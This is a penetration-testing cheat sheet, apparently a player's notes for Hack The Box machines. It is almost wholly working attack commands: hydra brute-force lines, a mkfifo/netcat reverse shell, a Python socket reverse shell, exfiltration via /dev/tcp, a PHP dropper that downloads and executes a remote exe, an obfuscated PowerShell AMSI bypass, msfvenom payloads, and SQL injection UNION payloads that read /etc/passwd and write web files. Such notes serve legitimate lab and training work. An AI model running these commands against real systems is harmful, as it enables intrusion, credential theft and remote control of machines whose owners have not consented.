Some of the commands/tools I often use when doing machines on HTB and similar platforms
- Scan
- Enumeration
- Bruteforce
- Linux Privilege Escalation
- Utilities
- Reverse Shells
- Services
- Tools
- Wordlists
- Miscellaneous
- Tunneling
- Web Exploitation
- Windows Enumeration and Privilege Escalation
sudo nmap -p- -sV -sC -oA nmap.out $IP --min-rate=5000nmap -sV -sC $IP -oN basic_scan.nmapnmap -sC -sV -p22,80 -Pn -oN nmap $IPsudo nmap -p22,80 -sV -sC -A -oN scan/open-tcp-ports.txt -sT $ipsudo rustscan -u 6500 -b 3000 -a $IP -sC -sV -oN scan.txtgobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u <URL>gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt -o output.txtgobuster dir -e -t50 -q -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <URL>gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u <URL> -o gobuster.outffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u <URL>/FUZZferoxbuster -u <URL> --force-recursion -C 404 -m GET,POST ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL>ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.DOMAIN" -u <URL>ffuf -u <URL>/FUZZ -X POST -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc all -fs 50- filter by size
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL> -fs {size}hydra -l $user -P /usr/share/wordlists/rockyou.txt -f $IP http-get /adminhydra -t 1 -V -f -l $user -P /usr/share/wordlists/rockyou.txt $ip smbhydra -l $user -P list.txt $ip ftphydra -l admin -P /usr/share/wordlists/rockyou.txt <URL> http-post-form "/admin/:user=admin&pass=^PASS^:Username or password invalid"hydra -L usernames_list.txt -P passwords_list.txt pop3://<ip>hydra -L usernames_list.txt -P $password <ip> -V http-form-post '/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'hydra -l <username> -P <passwords.txt> <ip> -V http-form-post "/wp-login:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30wpscan -v -U $wordlist -P $wordlist --url <URL/wp-login.php>ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <URL> -mr "username already exists"hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<ip>for i in $(seq 900 1000); do curl $IP:<port>/?page=../../../../proc/$i/cmdline -o -; echo "PID => $i"; doneffuf -c -u '<http://<ip>:<port>/otp-auth>' -H 'Content-Type: application/json' -X POST -d '{"otp":"FUZZ"}' -fr '{"success": "false"}' -w digits.txt -od outputwhere digits.txt is a file with all 4-digit pins and output is an empty dir
cat /etc/crontabgetcap -r / 2>/dev/nulldoas -u root /bin/bashnetstat -antnetstat -tulpennetstat -an -p tcpss -tlpimport pdb—> we can execute any code in the debugger
echo '/bin/bash' > systemctl
chmod +x systemctl
export PATH=.:$PATHsudo ifconfig tun0 mtu 1200on the victim machine
cat $file > /dev/tcp/<attacker ip>/<port>on the attacker machine
nc -nlvp <port> > filenamefind / -type f -group users 2>/dev/nullfind / -user root -perm -4000 -print 2>/dev/nullRules file
/etc/john/john.confexample rule
[List.Rules:$name]
Az"[0-9][0-9]"gpg --import private.keygpg --decrypt fragment.ascrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/fpython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'https://github.com/pentestmonkey/php-reverse-shell
https://highon.coffee/blog/reverse-shell-cheat-sheet/
<?php
$data = file_get_contents('<http://10.10.14.20:8000/xc.exe>');
file_put_contents('C:\\\\programdata\\\\xc_10.10.14.20_9001.exe' . $data);
system("C:\\\\programdata\\\\xc_10.10.14.20_9001.exe");
?>./xc -l -p 9001https://github.com/seriotonctf/shellcat
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )https://github.com/Xyan1d3/SharpEvader
python3 sharpevader.py -p windows/x64/meterpreter/reverse_tcp -lh tun0 -lp 9001msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx -o exploit.aspxmsfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "\x00\x25\x26" -f python -v shellcodesmbclient -L //<IP>smbclient //$IP/$sharesmbclient -U $user \\\\$ip\\$sharesmb: \\> recurse ON
smb: \\> prompt OFF
smb: \\> mget *run on attacker machine
smbserver.py share . -smb2supportrun on target machine
copy <filename> \\\\<IP>\\share\\<ftp://$user:$password@$domain> or $ip
example:
?u=ftp://user:heightofsecurity123!@forge.htblcd ftpscp -P22 user@IP:filename .scp $filename $user@$IP:.scp -r $user@$IP:/var/www/html .hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://$IPhydra -l <username> -P <wordlist> $IP -t 4 sshgrab your SSH key and add it to the authorized_keys file inside the .ssh folder in the target machine
ssh-keygen -f mykeyssh <USER>@<IP> -L <LOCAL PORT>:127.0.0.1:<LOCAL PORT>xfreerdp /u:$user /d:WORKGROUP /p:$pass /v:$ipwpscan --api-token '$your_token_here' --url $URL -U $user -P $password [ or password list ] wpscan --url $URL -e ap,uNon-Interactive command
mysql -u $user -p '$pass' -D $database -e '$command;'snmpwalk -v 2c -c public $IPget telnet password using snmp
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0Ref : http://www.irongeek.com/i.php?page=security/networkprinterhacking
docker pull [image name]docker run [image name]docker inspect [image name]docker run -it [image]docker history [image]docker history --no-trunc [image]docker save [image] -o layers.tarTo see previous commits
git showGet most recent commits -1
git diff HEAD~1sudo mount -t nfs <IP>: ./tmpredis-cli -h <IP> -a '$secret'KEYS *LRANGE authlist 1 100mongoshow dbsshow tablesdb.$table_name.find()Bruteforce login using hydra and msfconsole
- hydra
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<IP>- Using Metasploit
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts <rhost>
msf6 auxiliary(scanner/vnc/vnc_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/vnc/vnc_login) > runInteract with VNC
vncviewer <IP>rsync -av --list-only rsync://<IP>/<sharename> rsync -av rsync://<IP>/<sharename> <destination folder>rsync <filename> rsync://sys-internal@<IP>/files/sys-internal/.ssh- lse.sh: https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
- linpeas.sh: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
- winpeas.exe: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
- pspy64: https://github.com/DominicBreuker/pspy/releases
searchsploit -m php/webapps/49876.py [module name]https://github.com/micahvandeusen/gMSADumper
https://github.com/hemp3l/sucrack
https://github.com/Flangvik/SharpCollection
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
- seclists : https://github.com/danielmiessler/SecLists
- rockyou.txt
cewl -w wordlists.cewl $website -d 3cat wordlist.cewl | tr '[:upper:]' '[:lower:]' >> wordlists.cewlcat wordlists.cewl | sort -u > sorted.lstpython2 -c 'import pty;pty.spawn("/bin/bash")'script /dev/null -c bashpython3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermCtrl + Zstty raw -echo; fgstty rows <rows> columns <cols>https://github.com/jpillora/chisel
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
Used here : https://0xdf.gitlab.io/2022/05/03/htb-antique.html
python3 -m http.servercd /tmp
wget $ip/chisel_1.7.7_linux_amd64
chmod +x chiselI’ll run the binary in server mode on my box:
./chisel_1.7.7_linux_amd64 server -p <port> --reverseNow I’ll connect with chisel from the container:
./chisel_1.7.7_linux_amd64 client $my_ip:<port> R:<port to forward>:<target ip>:<port to forward>forwarding port 5985 from the docker container
- my machine
./chisel server -p 5000 --reverse- target machine
./chisel client <tun0 ip>:<port> R:<port to forward>:<target ip>:<port to forward>.\chisel.exe client <ip>:<local port to listen on> R:<first port to forward>:localhost:<first port to forward> R:<second port to forward>:localhost:<second port to forward>./socat tcp-listen:8001,reuseaddr,fork tcp:localhost:8000export http_proxy=127.0.0.1:8080' UNION SELECT 1,table_name from information_schema.tables where table_schema='webapp'-- -' UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_schema='webapp' and table_name='queue' -- -' UNION SELECT 1,'serioton' INTO OUTFILE '/var/www/html/test.html' -- -' UNION SELECT 1,load_file('/etc/passwd') -- -The script below looks for Win32 services on the host with unquoted service paths, not in the Windows folder.
Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch "`"" -and $_.PathName -inotmatch ":\\\\Windows\\\\" }| Select Name,Pathname- check for user privileges
whoami /priv- powershell history file
APPDATA\\roaming\\microsoft\\windows\\powershell\\psreadline\\ConsoleHost_History.txt- check for specific user info
net user $username- Get the LAPS passwords
Get-ADComputer -Filter * -Properties *crackmapexec winrm <ip> -u <username> -p <password>evil-winrm -i <ip> -u <username> -p <password>- bloodhound python
bloodhound-python -c all -u <username> -p <password> -d <domain> -dc <dc> -ns <ip> --disable-pooling -w1 --dns-timeout 30- first start neo4j
sudo neo4j console- then start bloodhound
bloodhound